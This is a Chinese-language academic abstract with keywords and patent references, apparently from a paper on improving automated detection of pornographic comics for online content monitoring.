网络淫秽色情信息的发展伴随着网络技术的发展不断成长,随着新兴的电子科技或网络技术的发展,网络淫秽色情也会在最短的时间内将新技术发展运用到自身的发展上去。从网络文字、图片、音频、视频,到流媒体播放、新兴游戏,再到最新最前沿的VR技术,网络淫秽色情的发展甚嚣其上。淫秽色情信息没有国界,全世界都需要加强对淫秽色情信息的监控,保障网络空间的健康发展,为当代以及未来国民的健康成长而努力。
摘要:网络的两大特质——“匿名性”、“便利性”,在不断地把新鲜资讯输出的同时,也将网络信息的副产物淫秽色情信息“塞”给人们,对网络的“清朗”带来很大的障碍。色情图片的鉴别技术虽然频频更新,但是对于色情漫画的鉴别率还没有完全达到其余类别色情图片的鉴别率,通过对现有技术的改进,以期提高对色情漫画鉴别的准确度,为更有效监控网络淫秽色情信息提供有益的借鉴。
关键词:网络信息监控,淫秽色情,色情漫画
参考文献
[1]对图像进行皮肤纹理检测的方法及系统[P].CN.A.CN101364263.2009年2月11日
[2]一种基于肤色和特征部位联合检测的色情图片识别方法[P].CN.A.CN101923652.2010年12月22日
[3]基于敏感部位检测的色情图像识别方法[P].CN.A.CN102184419.2011年9月14日